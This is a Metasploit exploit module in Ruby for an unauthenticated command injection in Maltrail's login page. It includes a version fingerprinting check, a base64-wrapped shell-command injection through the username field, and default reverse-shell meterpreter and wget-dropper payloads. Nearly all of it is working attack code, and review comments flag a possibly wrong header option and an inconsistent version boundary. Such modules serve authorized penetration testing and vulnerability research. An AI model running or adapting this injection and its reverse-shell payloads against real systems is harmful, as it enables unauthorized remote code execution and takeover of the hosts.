##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
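class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # First release that #check treats as fixed: anything below it is reported
  # as Appears, this version and later as Safe.
  # NOTE(review): the module description says "<= 0.54" is affected while this
  # boundary treats 0.54 as fixed — confirm which is right and reconcile.
  PATCHED_VERSION = '0.54'

  # Matches the "(v<b>0.53</b>)" fragment printed on the Maltrail landing page;
  # the single capture group is the dotted version string.
  VERSION_REGEX = %r{\(v<b>([0-9.]+)</b>\)}

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maltrail Unauthenticated Command Injection',
        'Description' => %q{
          Maltrail is a malicious traffic detection system, utilizing publicly
          available blacklists containing malicious and/or generally suspicious trails.
          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
          a command injection vulnerability in the `params.get("username")` parameter.
          An attacker can exploit this vulnerability by injecting arbitrary OS commands
          into the username parameter. The injected commands will be executed with the
          privileges of the running process. This vulnerability can be exploited remotely
          without authentication.

          Successfully tested against Maltrail versions 0.52 and 0.53.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI <egebalci[at]pm.me>', # msf module
          'Valentin Lobstein', # Add CVE reference + rewrite
          'Chris Wild', # original PoC, analysis
        ],
        'References' => [
          ['EDB', '51676'],
          ['CVE', '2025-34073'],
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
        ],
        'Platform' => %w[unix linux],
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2023-07-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8338),
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
      ]
    )
  end

  # Fingerprints the Maltrail web UI by fetching TARGETURI and comparing the
  # version printed on the page against PATCHED_VERSION.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when there is no response, the
  #   status is not 200, no version banner is found, or the banner cannot be
  #   parsed; Appears for versions below PATCHED_VERSION; Safe otherwise
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    match = res.body.to_s.match(VERSION_REGEX)
    # A 200 without the banner (e.g. a different application on this port) used
    # to raise NoMethodError on a nil version; report it as Unknown instead.
    return CheckCode::Unknown("#{peer} - Could not find a Maltrail version banner in the response") unless match

    begin
      version = Rex::Version.new(match[1])
    rescue ArgumentError
      # [0-9.]+ also accepts strings such as "..", which Rex::Version rejects
      return CheckCode::Unknown("#{peer} - Unparseable Maltrail version string: #{match[1]}")
    end

    return CheckCode::Appears("Version Detected: #{version}") if version < Rex::Version.new(PATCHED_VERSION)

    CheckCode::Safe("Version Detected: #{version}")
  end

  # Sends +cmd+ to the login endpoint inside the username parameter, the
  # injection point described in the References. The command is
  # base64-encoded into the request body, and URI encoding is disabled so the
  # body is sent exactly as built.
  #
  # @param cmd [String] command line to run on the target
  # @param _opts [Hash] accepted for CmdStager compatibility; unused
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, if any
  def execute_command(cmd, _opts = {})
    # NOTE(review): 'ctype' is nested under 'headers' here, whereas
    # send_request_cgi normally takes 'ctype' as a top-level option; this
    # likely emits a header literally named "ctype" rather than Content-Type.
    # Left as-is because the module is reported working — confirm before changing.
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      'uri_encode_mode' => 'none',
      'headers' => {
        'ctype' => 'application/x-www-form-urlencoded'
      },
      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
    )
  end

  # Runs the selected target: the encoded command payload directly for
  # :unix_cmd, or the wget command stager for :linux_dropper. Both targets
  # defined above carry a 'Type', so the status line applies to either.
  def exploit
    print_status("Executing #{target.name}...")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end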